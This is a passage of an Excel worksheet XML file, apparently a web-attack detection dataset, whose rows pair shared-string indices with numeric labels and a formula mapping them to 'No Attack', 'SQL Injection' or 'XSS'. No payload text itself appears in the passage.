        <v>30607</v>
      </c>
      <c r="B30231">
        <v>0</v>
      </c>
      <c r="C30231" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30232" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30232" s="1" t="s">
        <v>31266</v>
      </c>
      <c r="B30232">
        <v>0</v>
      </c>
      <c r="C30232" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30233" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30233" s="1" t="s">
        <v>30642</v>
      </c>
      <c r="B30233">
        <v>0</v>
      </c>
      <c r="C30233" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30234" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30234" s="1" t="s">
        <v>28098</v>
      </c>
      <c r="B30234">
        <v>0</v>
      </c>
      <c r="C30234" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30235" s="1" t="s">
        <v>34938</v>
      </c>
      <c r="B30235">
        <v>0</v>
      </c>
      <c r="C30235" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30236" s="1" t="s">
        <v>36417</v>
      </c>
      <c r="B30236">
        <v>0</v>
      </c>
      <c r="C30236" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30237" s="1" t="s">
        <v>31988</v>
      </c>
      <c r="B30237">
        <v>0</v>
      </c>
      <c r="C30237" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30238" s="1" t="s">
        <v>33438</v>
      </c>
      <c r="B30238">
        <v>0</v>
      </c>
      <c r="C30238" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30239" s="1" t="s">
        <v>31277</v>
      </c>
      <c r="B30239">
        <v>0</v>
      </c>
      <c r="C30239" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30240" s="1" t="s">
        <v>22512</v>
      </c>
      <c r="B30240">
        <v>0</v>
      </c>
      <c r="C30240" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30241" s="1" t="s">
        <v>8733</v>
      </c>
      <c r="B30241">
        <v>0</v>
      </c>
      <c r="C30241" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30242" s="1" t="s">
        <v>8476</v>
      </c>
      <c r="B30242">
        <v>0</v>
      </c>
      <c r="C30242" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30243" s="1" t="s">
        <v>32502</v>
      </c>
      <c r="B30243">
        <v>0</v>
      </c>
      <c r="C30243" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30244" s="1" t="s">
        <v>31074</v>
      </c>
      <c r="B30244">
        <v>0</v>
      </c>
      <c r="C30244" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30245" s="1" t="s">
        <v>33391</v>
      </c>
      <c r="B30245">
        <v>0</v>
      </c>
      <c r="C30245" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30246" s="1" t="s">
        <v>32113</v>
      </c>
      <c r="B30246">
        <v>0</v>
      </c>
      <c r="C30246" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30247" s="1" t="s">
        <v>32837</v>
      </c>
      <c r="B30247">
        <v>0</v>
      </c>
      <c r="C30247" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30248" s="1" t="s">
        <v>24198</v>
      </c>
      <c r="B30248">
        <v>0</v>
      </c>
      <c r="C30248" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30249" s="1" t="s">
        <v>22433</v>
      </c>
      <c r="B30249">
        <v>0</v>
      </c>
      <c r="C30249" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30250" s="1" t="s">
        <v>23481</v>
      </c>
      <c r="B30250">
        <v>0</v>
      </c>
      <c r="C30250" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30251" s="1" t="s">
        <v>21004</v>
      </c>
      <c r="B30251">
        <v>0</v>
      </c>
      <c r="C30251" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30252" s="1" t="s">
        <v>26876</v>
      </c>
      <c r="B30252">
        <v>0</v>
      </c>
      <c r="C30252" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30253" s="1" t="s">
        <v>33351</v>
      </c>
      <c r="B30253">
        <v>0</v>
      </c>
      <c r="C30253" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30254" s="1" t="s">
        <v>22789</v>
      </c>
      <c r="B30254">
        <v>0</v>
      </c>
      <c r="C30254" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30255" s="1" t="s">
        <v>29129</v>
      </c>
      <c r="B30255">
        <v>0</v>
      </c>
      <c r="C30255" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30256" s="1" t="s">
        <v>20762</v>
      </c>
      <c r="B30256">
        <v>0</v>
      </c>
      <c r="C30256" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30257" s="1" t="s">
        <v>20169</v>
      </c>
      <c r="B30257">
        <v>0</v>
      </c>
      <c r="C30257" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30258" s="1" t="s">
        <v>33430</v>
      </c>
      <c r="B30258">
        <v>0</v>
      </c>
      <c r="C30258" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30259" s="1" t="s">
        <v>35397</v>
      </c>
      <c r="B30259">
        <v>0</v>
      </c>
      <c r="C30259" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30260" s="1" t="s">
        <v>28734</v>
      </c>
      <c r="B30260">
        <v>0</v>
      </c>
      <c r="C30260" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30261" s="1" t="s">
        <v>23561</v>
      </c>
      <c r="B30261">
        <v>0</v>
      </c>
      <c r="C30261" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30262" s="1" t="s">
        <v>33805</v>
      </c>
      <c r="B30262">
        <v>0</v>
      </c>
      <c r="C30262" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30263" s="1" t="s">
        <v>36051</v>
      </c>
      <c r="B30263">
        <v>0</v>
      </c>
      <c r="C30263" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30264" s="1" t="s">
        <v>20396</v>
      </c>
      <c r="B30264">
        <v>0</v>
      </c>
      <c r="C30264" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30265" s="1" t="s">
        <v>28396</v>
      </c>
      <c r="B30265">
        <v>0</v>
      </c>
      <c r="C30265" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30266" s="1" t="s">
        <v>29511</v>
      </c>
      <c r="B30266">
        <v>0</v>
      </c>
      <c r="C30266" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30267" s="1" t="s">
        <v>27584</v>
      </c>
      <c r="B30267">
        <v>0</v>
      </c>
      <c r="C30267" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30268" s="1" t="s">
        <v>23036</v>
      </c>
      <c r="B30268">
        <v>0</v>
      </c>
      <c r="C30268" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30269" s="1" t="s">
        <v>24136</v>
      </c>
      <c r="B30269">
        <v>0</v>
      </c>
      <c r="C30269" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30270" s="1" t="s">
        <v>34123</v>
      </c>
      <c r="B30270">
        <v>0</v>
      </c>
      <c r="C30270" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30271" s="1" t="s">
        <v>31855</v>
      </c>
      <c r="B30271">
        <v>0</v>
      </c>
      <c r="C30271" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30272" s="1" t="s">
        <v>30689</v>
      </c>
      <c r="B30272">
        <v>0</v>
      </c>
      <c r="C30272" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30273" s="1" t="s">
        <v>10920</v>
      </c>
      <c r="B30273">
        <v>0</v>
      </c>
      <c r="C30273" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30274" s="1" t="s">
        <v>10921</v>
      </c>
      <c r="B30274">
        <v>0</v>
      </c>
      <c r="C30274" s="7" t="str">
        <f t="shared" si="472"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30275" s="1" t="s">
        <v>10472</v>
      </c>
      <c r="B30275">
        <v>0</v>
      </c>
      <c r="C30275" s="7" t="str">
        <f t="shared" ref="C30275:C30338" si="473">IF(B30275=0,"No Attack", IF(B30275=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30276" s="1" t="s">
        <v>10473</v>
      </c>
      <c r="B30276">
        <v>0</v>
      </c>
      <c r="C30276" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30277" s="1" t="s">
        <v>10474</v>
      </c>
      <c r="B30277">
        <v>0</v>
      </c>
      <c r="C30277" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30278" s="1" t="s">
        <v>10475</v>
      </c>
      <c r="B30278">
        <v>0</v>
      </c>
      <c r="C30278" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30279" s="1" t="s">
        <v>10476</v>
      </c>
      <c r="B30279">
        <v>0</v>
      </c>
      <c r="C30279" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30280" s="1" t="s">
        <v>10477</v>
      </c>
      <c r="B30280">
        <v>0</v>
      </c>
      <c r="C30280" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30281" s="1" t="s">
        <v>10478</v>
      </c>
      <c r="B30281">
        <v>0</v>
      </c>
      <c r="C30281" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30282" s="1" t="s">
        <v>10479</v>
      </c>
      <c r="B30282">
        <v>0</v>
      </c>
      <c r="C30282" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30283" s="1" t="s">
        <v>10480</v>
      </c>
      <c r="B30283">
        <v>0</v>
      </c>
      <c r="C30283" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30284" s="1" t="s">
        <v>10481</v>
      </c>
      <c r="B30284">
        <v>0</v>
      </c>
      <c r="C30284" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30285" s="1" t="s">
        <v>10482</v>
      </c>
      <c r="B30285">
        <v>0</v>
      </c>
      <c r="C30285" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30286" s="1" t="s">
        <v>10483</v>
      </c>
      <c r="B30286">
        <v>0</v>
      </c>
      <c r="C30286" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30287" s="1" t="s">
        <v>10484</v>
      </c>
      <c r="B30287">
        <v>0</v>
      </c>
      <c r="C30287" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30288" s="1" t="s">
        <v>10485</v>
      </c>
      <c r="B30288">
        <v>0</v>
      </c>
      <c r="C30288" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30289" s="1" t="s">
        <v>10486</v>
      </c>
      <c r="B30289">
        <v>0</v>
      </c>
      <c r="C30289" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30290" s="1" t="s">
        <v>10487</v>
      </c>
      <c r="B30290">
        <v>0</v>
      </c>
      <c r="C30290" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30291" s="1" t="s">
        <v>10488</v>
      </c>
      <c r="B30291">
        <v>0</v>
      </c>
      <c r="C30291" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30292" s="1" t="s">
        <v>140</v>
      </c>
      <c r="B30292">
        <v>1</v>
      </c>
      <c r="C30292" s="7" t="str">
        <f t="shared" si="473"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30293" s="1" t="s">
        <v>10489</v>
      </c>
      <c r="B30293">
        <v>0</v>
      </c>
      <c r="C30293" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30294" s="1" t="s">
        <v>10490</v>
      </c>
      <c r="B30294">
        <v>0</v>
      </c>
      <c r="C30294" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30295" s="1" t="s">
        <v>10491</v>
      </c>
      <c r="B30295">
        <v>0</v>
      </c>
      <c r="C30295" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30296" s="1" t="s">
        <v>10492</v>
      </c>
      <c r="B30296">
        <v>0</v>
      </c>
      <c r="C30296" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30297" s="1" t="s">
        <v>10493</v>
      </c>
      <c r="B30297">
        <v>0</v>
      </c>
      <c r="C30297" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30298" s="1" t="s">
        <v>10494</v>
      </c>
      <c r="B30298">
        <v>0</v>
      </c>
      <c r="C30298" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30299" s="1" t="s">
        <v>10495</v>
      </c>
      <c r="B30299">
        <v>0</v>
      </c>
      <c r="C30299" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30300" s="1" t="s">
        <v>10496</v>
      </c>
      <c r="B30300">
        <v>0</v>
      </c>
      <c r="C30300" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30301" s="1" t="s">
        <v>10497</v>
      </c>
      <c r="B30301">
        <v>0</v>
      </c>
      <c r="C30301" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30302" s="1" t="s">
        <v>10498</v>
      </c>
      <c r="B30302">
        <v>0</v>
      </c>
      <c r="C30302" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30303" s="1" t="s">
        <v>10499</v>
      </c>
      <c r="B30303">
        <v>0</v>
      </c>
      <c r="C30303" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30304" s="1" t="s">
        <v>10500</v>
      </c>
      <c r="B30304">
        <v>0</v>
      </c>
      <c r="C30304" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30305" s="1" t="s">
        <v>10501</v>
      </c>
      <c r="B30305">
        <v>0</v>
      </c>
      <c r="C30305" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30306" s="1" t="s">
        <v>10502</v>
      </c>
      <c r="B30306">
        <v>0</v>
      </c>
      <c r="C30306" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30307" s="1" t="s">
        <v>10503</v>
      </c>
      <c r="B30307">
        <v>0</v>
      </c>
      <c r="C30307" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30308" s="1" t="s">
        <v>10504</v>
      </c>
      <c r="B30308">
        <v>0</v>
      </c>
      <c r="C30308" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30309" s="1" t="s">
        <v>10505</v>
      </c>
      <c r="B30309">
        <v>0</v>
      </c>
      <c r="C30309" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30310" s="1" t="s">
        <v>10506</v>
      </c>
      <c r="B30310">
        <v>0</v>
      </c>
      <c r="C30310" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30311" s="1" t="s">
        <v>10507</v>
      </c>
      <c r="B30311">
        <v>0</v>
      </c>
      <c r="C30311" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30312" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30312" s="1" t="s">
        <v>10508</v>
      </c>
      <c r="B30312">
        <v>0</v>
      </c>
      <c r="C30312" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30313" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30313" s="1" t="s">
        <v>10509</v>
      </c>
      <c r="B30313">
        <v>0</v>
      </c>
      <c r="C30313" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30314" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30314" s="1" t="s">
        <v>10510</v>
      </c>
      <c r="B30314">
        <v>0</v>
      </c>
      <c r="C30314" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30315" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30315" s="1" t="s">
        <v>10511</v>
      </c>
      <c r="B30315">
        <v>0</v>
      </c>
      <c r="C30315" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30316" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30316" s="1" t="s">
        <v>10512</v>
      </c>
      <c r="B30316">
        <v>0</v>
      </c>
      <c r="C30316" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30317" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30317" s="1" t="s">
        <v>10513</v>
      </c>
      <c r="B30317">
        <v>0</v>
      </c>
      <c r="C30317" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30318" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30318" s="1" t="s">
        <v>10514</v>
      </c>
      <c r="B30318">
        <v>0</v>
      </c>
      <c r="C30318" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30319" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30319" s="1" t="s">
        <v>10515</v>
      </c>
      <c r="B30319">
        <v>0</v>
      </c>
      <c r="C30319" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30320" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30320" s="1" t="s">
        <v>10516</v>
      </c>
      <c r="B30320">
        <v>0</v>
      </c>
      <c r="C30320" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30321" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30321" s="1" t="s">
        <v>10517</v>
      </c>
      <c r="B30321">
        <v>0</v>
      </c>
      <c r="C30321" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30322" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30322" s="1" t="s">
        <v>36298</v>
      </c>
      <c r="B30322">
        <v>0</v>
      </c>
      <c r="C30322" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30323" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30323" s="1" t="s">
        <v>31210</v>
      </c>
      <c r="B30323">
        <v>0</v>
      </c>
      <c r="C30323" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30324" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30324" s="1" t="s">
        <v>36288</v>
      </c>
      <c r="B30324">
        <v>0</v>
      </c>
      <c r="C30324" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30325" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30325" s="1" t="s">
        <v>36763</v>
      </c>
      <c r="B30325">
        <v>0</v>
      </c>
      <c r="C30325" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30326" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30326" s="1" t="s">
        <v>32757</v>
      </c>
      <c r="B30326">
        <v>0</v>
      </c>
      <c r="C30326" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30327" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30327" s="1" t="s">
        <v>37269</v>
      </c>
      <c r="B30327">
        <v>0</v>
      </c>
      <c r="C30327" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30328" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30328" s="1" t="s">
        <v>27657</v>
      </c>
      <c r="B30328">
        <v>0</v>
      </c>
      <c r="C30328" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30329" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30329" s="1" t="s">
        <v>20470</v>
      </c>
      <c r="B30329">
        <v>0</v>
      </c>
      <c r="C30329" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30330" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30330" s="1" t="s">
        <v>28045</v>
      </c>
      <c r="B30330">
        <v>0</v>
      </c>
      <c r="C30330" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30331" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30331" s="1" t="s">
        <v>20105</v>
      </c>
      <c r="B30331">
        <v>0</v>
      </c>
      <c r="C30331" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30332" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30332" s="1" t="s">
        <v>20639</v>
      </c>
      <c r="B30332">
        <v>0</v>
      </c>
      <c r="C30332" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30333" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30333" s="1" t="s">
        <v>37389</v>
      </c>
      <c r="B30333">
        <v>0</v>
      </c>
      <c r="C30333" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30334" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30334" s="1" t="s">
        <v>35691</v>
      </c>
      <c r="B30334">
        <v>0</v>
      </c>
      <c r="C30334" s="7" t="str">
        <f t="shared" si="473"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30335" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30335" s="1" t="s">
        <v>23230</v>
      </c>
      <c r="B30335">
        <v>0</v>
      </c>
      <c r="C30335" s="7" t="str">
        <f t="shared" si="473"/>
